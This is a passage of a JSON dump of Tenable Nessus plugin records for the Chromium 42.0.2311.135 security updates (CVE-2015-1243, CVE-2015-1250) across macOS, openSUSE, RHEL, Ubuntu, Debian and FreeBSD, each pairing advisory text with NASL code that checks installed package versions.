value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'42.0.2311.135', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:38", "description": "Chromium was updated to 42.0.2311.135 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2015-1243: Use-after-free in DOM\n\n - CVE-2015-1250: Various fixes from internal audits, fuzzing and other initiatives.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2015-354)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-354.NASL", "href": "https://www.tenable.com/plugins/nessus/83393", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-354.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83393);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2015-354)\");\n script_summary(english:\"Check for the openSUSE-2015-354 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 42.0.2311.135 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2015-1243: Use-after-free in DOM\n\n - CVE-2015-1250: Various fixes from internal audits,\n fuzzing and other initiatives.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=929075\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-42.0.2311.135-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-42.0.2311.135-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-42.0.2311.135-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-42.0.2311.135-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-42.0.2311.135-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-gnome-42.0.2311.135-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-42.0.2311.135-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-42.0.2311.135-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-42.0.2311.135-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-42.0.2311.135-26.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-42.0.2311.135-26.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-42.0.2311.135-26.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-42.0.2311.135-26.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-42.0.2311.135-26.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-42.0.2311.135-26.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-42.0.2311.135-26.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-42.0.2311.135-26.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-42.0.2311.135-26.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:16", "description": "Updated chromium-browser packages that fix multiple security issues and one bug are now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash or, potentially, execute arbitrary code with the privileges of the user running Chromium. (CVE-2015-1243, CVE-2015-1250)\n\nThis update also fixes the following bug :\n\n* Prior to this update, Chromium did not accept GNOME's system proxy settings due to having GConf support disabled. This issue has been resolved in this update. (BZ#1217065)\n\nAll Chromium users should upgrade to these updated packages, which contain Chromium version 42.0.2311.135, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the changes to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-01T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2015:0921)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6"], "id": "REDHAT-RHSA-2015-0921.NASL", "href": "https://www.tenable.com/plugins/nessus/83173", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0921. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83173);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n script_bugtraq_id(74389);\n script_xref(name:\"RHSA\", value:\"2015:0921\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2015:0921)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated chromium-browser packages that fix multiple security issues\nand one bug are now available for Red Hat Enterprise Linux 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2015-1243, CVE-2015-1250)\n\nThis update also fixes the following bug :\n\n* Prior to this update, Chromium did not accept GNOME's system proxy\nsettings due to having GConf support disabled. This issue has been\nresolved in this update. (BZ#1217065)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 42.0.2311.135, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.\"\n );\n # http://googlechromereleases.blogspot.com/2015/04/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/2015/04/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1243\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1250\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0921\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-42.0.2311.135-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-42.0.2311.135-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-42.0.2311.135-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-42.0.2311.135-1.el6_6\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:13", "description": "A use-after-free was discovered in the DOM implementation in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-1243)\n\nMultiple security issues were discovered in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to read uninitialized memory, cause a denial of service via application crash or execute arbitrary code with the privileges of the user invoking the program. (CVE-2015-1250).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-07T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 14.10 / 15.04 : oxide-qt vulnerabilities (USN-2582-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "UBUNTU_USN-2582-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83277", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2582-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83277);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n script_bugtraq_id(74389);\n script_xref(name:\"USN\", value:\"2582-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 14.10 / 15.04 : oxide-qt vulnerabilities (USN-2582-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A use-after-free was discovered in the DOM implementation in Blink. If\na user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to cause a denial of service\nvia renderer crash, or execute arbitrary code with the privileges of\nthe sandboxed render process. (CVE-2015-1243)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1250).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2582-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected liboxideqtcore0 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|14\\.10|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 14.10 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.6.6-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"liboxideqtcore0\", pkgver:\"1.6.6-0ubuntu0.14.10.1\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.6.6-0ubuntu0.15.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:13", "description": "Several vulnerabilities were discovered in the chromium web browser :\n\n - CVE-2015-1243 Saif El-Sherei discovered a use-after-free issue.\n\n - CVE-2015-1250 The chrome 42 team found and fixed multiple issues during internal auditing.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-04T00:00:00", "type": "nessus", "title": "Debian DSA-3242-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3242.NASL", "href": "https://www.tenable.com/plugins/nessus/83191", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3242. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83191);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n script_bugtraq_id(74389);\n script_xref(name:\"DSA\", value:\"3242\");\n\n script_name(english:\"Debian DSA-3242-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in the chromium web browser :\n\n - CVE-2015-1243\n Saif El-Sherei discovered a use-after-free issue.\n\n - CVE-2015-1250\n The chrome 42 team found and fixed multiple issues\n during internal auditing.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1243\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1250\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3242\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 42.0.2311.135-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"chromedriver\", reference:\"42.0.2311.135-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium\", reference:\"42.0.2311.135-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-dbg\", reference:\"42.0.2311.135-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-inspector\", reference:\"42.0.2311.135-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-l10n\", reference:\"42.0.2311.135-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:12", "description": "Google Chrome Releases reports :\n\n5 security fixes in this release, including :\n\n- [453279] High CVE-2015-1243: Use-after-free in DOM. Credit to Saif El-Sherei.\n\n- [481777] CVE-2015-1250: Various fixes from internal audits, fuzzing and other initiatives.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-29T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (210f80b9-ede4-11e4-81c4-00262d5ed8ee)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-npapi", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_210F80B9EDE411E481C400262D5ED8EE.NASL", "href": 